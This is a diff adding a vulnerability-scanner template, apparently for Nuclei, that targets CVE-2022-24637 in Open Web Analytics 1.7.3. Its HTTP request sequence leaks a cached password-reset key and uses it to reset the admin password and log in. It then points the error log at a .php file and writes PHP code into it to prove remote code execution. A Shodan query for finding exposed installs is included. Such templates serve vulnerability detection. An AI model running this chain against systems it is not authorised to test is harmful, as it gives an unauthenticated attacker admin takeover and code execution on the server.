diff --git a/http/cves/2022/CVE-2022-24637.yaml b/http/cves/2022/CVE-2022-24637.yaml
new file mode 100644
index 0000000000..26d7428ae9
--- /dev/null
+++ b/http/cves/2022/CVE-2022-24637.yaml
@@ -0,0 +1,166 @@
+id: CVE-2022-24637
+
+info:
+  name: Open Web Analytics 1.7.3 - Remote Code Execution
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
+  reference:
+    - https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/open_web_analytics_rce.rb
+    - http://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
+    - https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4
+    - https://github.com/Pflegusch/CVE-2022-24637
+    - https://github.com/c0derpwner/HTB-pwned
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-24637
+    cwe-id: CWE-269
+    epss-score: 0.84852
+    epss-percentile: 0.98585
+    cpe: cpe:2.3:a:openwebanalytics:open_web_analytics:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 6
+    vendor: openwebanalytics
+    product: open_web_analytics
+    shodan-query: cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"
+  tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics
+
+variables:
+  password: "{{randbase(8)}}@123!"
+  secret: "{{randstr}}"
+  secret_b64: "{{base64(secret)}}"
+
+flow: |
+  http(1);
+  http(2);
+  javascript();
+  http(3);
+  http(4); http(5); http(6); http(7);
+
+javascript:
+  - code: |
+          idx=serobj.indexOf('temp_passkey');
+          passubstr=serobj.substring(idx,idx+120);
+          temp_pass=(passubstr.match(/s:32:"([a-f0-9]{32})"/)[1])
+          temp_pass
+
+    args:
+      serobj: "{{base64_decode(serializedobj)}}"
+
+http:
+  - raw:
+      - |
+        POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Login Failed"
+        internal: true
+
+  - raw:
+      - |
+        GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        name: serializedobj
+        internal: true
+        regex:
+          - '<\?php\\n\/\*([A-Za-z0-9=]+)\*\/\\n\?>'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - <?php\n
+        internal: true
+
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(location,'owa_status_code=3006')"
+          - "status_code==302"
+        internal: true
+        condition: and
+
+  - raw:
+      - |
+        POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(set_cookie,'owa_p')"
+          - "status_code==302"
+        internal: true
+        condition: and
+
+  - raw:
+      - |
+        GET /index.php?owa_do=base.optionsGeneral HTTP/1.1
+        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        name: nonce
+        internal: true
+        regex:
+          - 'name="owa_nonce" value="([a-z0-9]+)">'
+
+  - raw:
+      - |
+        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2
+
+  - raw:
+      - |
+        POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
+        Content-Type: application/x-www-form-urlencoded
+
+        owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>
+
+      - |
+        GET /owa-data/caches/{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '[debug_log]'
+          - "{{secret}}"
+        condition: and